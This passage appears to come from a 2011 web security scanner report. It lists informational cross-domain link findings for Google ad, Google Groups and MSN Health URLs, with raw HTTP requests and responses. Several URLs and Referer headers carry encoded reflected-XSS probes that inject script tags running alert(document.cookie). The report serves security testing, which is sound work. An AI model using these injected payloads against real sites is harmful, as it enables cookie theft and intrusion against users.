P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 06 Feb 2011 14:32:25 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10613

<style>body{margin:0;padding:0}</style><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:300px"><div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf">
...[SNIP]...
53DImageAd%2526gl%253DUS%26usg%3DAFQjCNE47zxaUgDeDd7HMvKLJ4RVEZSyvQ&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png&flash_element_id=google_flash_embed"><EMBED src="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="google_xml_addata=%3CTEMPLATE_PARAMETERS%3E%3CNO_CONTAINER_XML/%3E%3CTEMPLATE_WIDTH%3E300%3C/TEMPLATE_WIDTH%3E%3CTEMPLATE_HEIGHT%3E250%3C/TEMPLATE_HEIGHT%3E%3CTEMPLATE_URL%3Ehttp%3A//pagead2.googlesyndication.com/pagead/gadgets/elegant_V4/elegant_V4_spec_300_250.swf%3C/TEMPLATE_URL%3E%3CTEMPLATE_AIT_URL%3Ehttp%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBdzKd-LBOTbigJdX7lQfcksCCD8vHr9wB84bvnBfLsNeXSdCWURABGAEghuy3BzgAUNzCuqf7_____wFgyb6yiZCk0BGgAaPRjv8DsgEZd3d3LndvcmxkbWFzdGlmZmZvcnVtLmNvbboBCjMwMHgyNTBfYXPIAQTaAVtodHRwOi8vd3d3LndvcmxkbWFzdGlmZmZvcnVtLmNvbS8_ZDExZTIlMjIlM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0VmNmEwMDljYjUwMj0x-AEBgAIBuAIYwAIByAKzwtsOqAMB9QMAAADE%26amp%3Bsigh%3D56qV1FJ_chI%26amp%3Blabel%3D_AITNAME_%26amp%3Bvalue%3D_AITVALUE_%3C/TEMPLATE_AIT_URL%3E%3CTEMPLATE_ELEMENT+element_name%3D%22adData%22+index%3D%220%22%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFText%22%3EProject+Management%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFont%22%3Enimbus_b%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextColor%22%3E0x373737%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFText%22%3EFree+IT+Project+Management+Guide%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFTextFont%22%3Enimbus_b%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFTextColor%22%3E0xCC0000%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFText%22%3EGet+it+Now!%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFont%22%3Egill%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextColor%22%3E0xFFFFFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22product1MCImage%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCLrj2bntwZbsBhBTGGoyCIGG5IkY0I-s%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrlColor%22%3E0x000000%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFontName%22%3E_nimbus_b%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCI6Gg9aaidLH8wEQ____________ARj___________8BMggYNfR-dAlwBg%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFTextFontName%22%3E_nimbus_b%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2TFTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCI6Gg9aaidLH8wEQ____________ARj___________8BMggYNfR-dAlwBg%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFontName%22%3E_gill%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCI6Gg9aaidLH8wEQ____________ARj___________8BMggYNfR-dAlwBg%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrl%22%3EITBusinessEdge.com%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22destinationUrl%22%3Ehttp%3A//www.itbusinessedge.com/info/gglprojmgmtbeta.aspx%3C/TEMPLATE_FIELD%3E%3C/TEMPLATE_ELEMENT%3E%3C/TEMPLATE_PARAMETERS%3E&google_width=300&google_height=250&destination_url=http%3A//www.itbusinessedge.com/info/gglprojmgmtbeta.aspx&display_url=ITBusinessEdge.com&google_click_url=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBdzKd-LBOTbigJdX7lQfcksCCD8vHr9wB84bvnBfLsNeXSdCWURABGAEghuy3BzgAUNzCuqf7_____wFgyb6yiZCk0BGgAaPRjv8DsgEZd3d3LndvcmxkbWFzdGlmZmZvcnVtLmNvbboBCjMwMHgyNTBfYXPIAQTaAVtodHRwOi8vd3d3LndvcmxkbWFzdGlmZmZvcnVtLmNvbS8_ZDExZTIlMjIlM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0VmNmEwMDljYjUwMj0x-AEBgAIBuAIYwAIByAKzwtsOqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtxistPBcpogazE0aj17ja403kNDNQ%26client%3Dca-pub-5638914851100523%26adurl%3D&google_ait_url=http%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBdzKd-LBOTbigJdX7lQfcksCCD8vHr9wB84bvnBfLsNeXSdCWURABGAEghuy3BzgAUNzCuqf7_____wFgyb6yiZCk0BGgAaPRjv8DsgEZd3d3LndvcmxkbWFzdGlmZmZvcnVtLmNvbboBCjMwMHgyNTBfYXPIAQTaAVtodHRwOi8vd3d3LndvcmxkbWFzdGlmZmZvcnVtLmNvbS8_ZDExZTIlMjIlM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0VmNmEwMDljYjUwMj0x-AEBgAIBuAIYwAIByAKzwtsOqAMB9QMAAADE%26sigh%3D56qV1FJ_chI%26label%3D_AITNAME_%26value%3D_AITVALUE_&google_target_in_new_window=true&google_abg_url=http%3A//www.google.com/url%3Fct%3Dabg%26q%3Dhttps%3A//www.google.com/adsense/support/bin/request.py%253Fcontact%253Dabg_afc%2526url%253Dhttp%3A//www.worldmastiffforum.com/%25253Fd11e2%25252522%2525253E%2525253Cscript%2525253Ealert(1)%2525253C/script%2525253Ef6a009cb502%25253D1%2526hl%253Den%2526client%253Dca-pub-5638914851100523%2526adU%253DITBusinessEdge.com%2526adT%253DImageAd%2526gl%253DUS%26usg%3DAFQjCNE47zxaUgDeDd7HMvKLJ4RVEZSyvQ&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png&flash_element_id=google_flash_embed" TYPE="application/x-shockwave-flash" AllowScriptAccess="always" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...

17.114. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/images/ainw_000000.gif
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.boardreader.com/domain/2mdn.net/x22%253Febef7%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E6f696982a6d%253D1%26hl%3Den%26client%3Dca-pub-4537085524273794%26adU%3Dwww.Moxiesoft.com%26adT%3DIntegrating%2BLive%2BChat%253F%26adU%3Dwww.BuyDomains.com%26adT%3DDomains%2BFor%2BSale%26adU%3Dwww.Consumer-Rankings.com/Hosting%26adT%3D2010%2526%252339%253Bs%2BBest%2BWeb%2BHosts%26gl%3DUS&usg=AFQjCNFFBfZ-VI3n-LKVOMyTCBXDiI8KJA

Request

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.115. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024427&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002827741&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=1860322786%2C1860322786&correlator=1297002827693&frm=0&adk=3799866133&ga_vid=1997205418.1297002828&ga_sid=1297002828&ga_hid=2047477175&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F75&fu=0&ifi=3&dtd=15&xpc=SS0d4Bm2Jh&p=http%3A//www.worldmastiffforum.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.worldmastiffforum.com/%253Fd11e2%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ef6a009cb502%253D1%26hl%3Den%26client%3Dca-pub-5638914851100523%26adU%3Dwww.AriaSystems.com%26adT%3DOnline%2BPayment%2BSimplified%26adU%3Dwww.FirstData.com/WhitePaper%26adT%3DPCI%2BDSS%2BCompliance%26adU%3Dwww.splunk.com/PCICompliance%26adT%3DFree%2BPCI%2BCompliance%2BTest%26adU%3Dwww.dataguise.com%26adT%3DSecuring%2BSensitive%2BData%26gl%3DUS&usg=AFQjCNHRENIodlL_4tKw0EALvk-ZbSz0rg

Request

GET /pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024427&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002827741&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=1860322786%2C1860322786&correlator=1297002827693&frm=0&adk=3799866133&ga_vid=1997205418.1297002828&ga_sid=1297002828&ga_hid=2047477175&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F75&fu=0&ifi=3&dtd=15&xpc=SS0d4Bm2Jh&p=http%3A//www.worldmastiffforum.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6a009cb502=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

17.116. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=468x60_as&output=html&h=60&w=468&lmt=1296698940&channel=2660416438&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D78091123&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677340464&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677340510&frm=0&adk=1439102223&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=863073551&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F43&fu=0&ifi=1&dtd=71&xpc=PKtuaqHle9&p=http%3A//boardreader.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.boardreader.com/domain/2mdn.net/x22%253Febef7%252522%25253E%25253Cscript%25253Ealert(1)%25253C/script%25253E6f696982a6d%253D1%26hl%3Den%26client%3Dca-pub-4537085524273794%26adU%3Dwww.facebook.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGutemGwcV815hshI8lxuFvTfqQ7Q

Request

Response

17.117. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6045830449&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2Fstatic.2mdn.net.html&dt=1296664188477&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664188479&frm=1&adk=2903642409&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=1564756237&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3438480888&fu=4&ifi=1&dtd=3

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.robtex.com/dns/static.2mdn.net.html%26hl%3Den%26client%3Dca-pub-9079685345082025%26adU%3Dwww.GoGrid.com/WhitePaper%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHdn-ePva6LMlP_pvKhTQiTWTmsDA

Request

GET /pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6045830449&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2Fstatic.2mdn.net.html&dt=1296664188477&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664188479&frm=1&adk=2903642409&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=1564756237&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3438480888&fu=4&ifi=1&dtd=3 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/nb728.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.118. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6087885694&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2Fstatic.2mdn.net.html&dt=1296664188469&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664188471&frm=1&adk=1016365894&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=302020320&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3082672102&fu=4&ifi=1&dtd=5

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.robtex.com/dns/static.2mdn.net.html%26hl%3Den%26client%3Dca-pub-9079685345082025%26adU%3Dwww.Moxiesoft.com%26adT%3DMoxie%2BLive%2BChat%2BSolutions%26adU%3Dwww.3DCart.com%26adT%3DCreate%2BYour%2BOnline%2BStore%26adU%3Dwww.gfi.com%26adT%3DGFI%2BLANguard%26gl%3DUS&usg=AFQjCNE71yF0LB5rn7IoxvgTcRbhLQ67bw

Request

GET /pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6087885694&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2Fstatic.2mdn.net.html&dt=1296664188469&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664188471&frm=1&adk=1016365894&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=302020320&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3082672102&fu=4&ifi=1&dtd=5 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/nt728.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.119. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The page was loaded from a URL containing a query string:

http://groups.google.com/groups?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=wg

The response contains the following link to another domain:

http://www.youtube.com/?q=millenium+boston&ie=UTF-8&hl=en&tab=g1

Request

Response

17.120. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The page was loaded from a URL containing a query string:

http://groups.google.com/groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&q=ges&ie=UTF-8&tab=g1

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:34:27 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=9a78c9779c82fa01:TM=1296574467:LM=1296574467:S=xKeU6xeEe_S8pKue; expires=Thu, 31-Jan-2013 15:34:27 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...
</b> <a href="http://www.youtube.com/?hl=en&q=ges&ie=UTF-8&tab=g1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

17.121. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.msn.com
Path:	/health-topics/quit-smoking/articlepage.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://health.msn.com/health-topics/quit-smoking/articlepage.aspx?cp-documentid=100269246&gt1=31020

The response contains the following links to other domains:

http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://health.msn.us.intellitxt.com/ast/js/msn/health.msn_cs.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalhealth.112.2o7.net/b/ss/msnportalhealth/1/H.1--NS/0
http://onlinehelp.microsoft.com/en-us/msn/healthandfitness.aspx
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=MSNHPR
http://www.bing.com/search?q=eat+less+salt&form=MSNS21
http://www.bing.com/search?q=effectiveness+of+smoking+cessation+products&go=&form=A8
http://www.bing.com/search?q=hormone+therapy+new+concerns&form=MSNS21
http://www.bing.com/search?q=hot+saucing&form=MSNS21
http://www.bing.com/search?q=in-vitro+meat&form=MSNS21
http://www.bing.com/search?q=sleep+%26+PTSD+study&form=MSNS21
http://www.bing.com/search?q=strange+ways+to+quit+smoking&form=a8
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.interactivemediaawards.com/winners/certificate.asp?param=75599&cat=1
http://www.myhomemsn.com/
http://www.self.com/fitness/workouts/2007/06/six-day-body-slimming-slideshow?mbid=synd_msnhlth
http://www.self.com/fooddiet/2009/06/30-healthy-snacks?mbid=synd_yshine
http://www.self.com/fooddiet/2010/06/superfoods-for-flat-abs-slideshow?mbid=synd_msnhlth
http://www.self.com/goal?mbid=synd_msnhlth
http://www.self.com/health/2007/09/guide-on-getting-screened
http://www.self.com/health/2009/10/lung-cancer
http://www.self.com/health/2009/10/oral-cancer
http://www.self.com/health/2009/10/reduce-cancer-risk-diet
http://www.self.com/health/blogs/healthyself/2010/08/how-to-avoid-germs-at-the-gym.html?mbid=synd_msnhlth
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574490&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fhealth.msn.com%2Fhealth-topics%2Fquit-smoking%2Farticlepage.aspx%3Fcp-documentid%3D100269246%26gt1%3D31020&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /health-topics/quit-smoking/articlepage.aspx?cp-documentid=100269246&gt1=31020 HTTP/1.1
Host: health.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:34:50 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA24
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=4a4ed5dca52f42f9a481173fc3bc4d69; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A695048FB7A944B081461E938BE73ECA; domain=.msn.com; expires=Sat, 20-Aug-2011 15:34:50 GMT; path=/
Cache-Control: no-cache
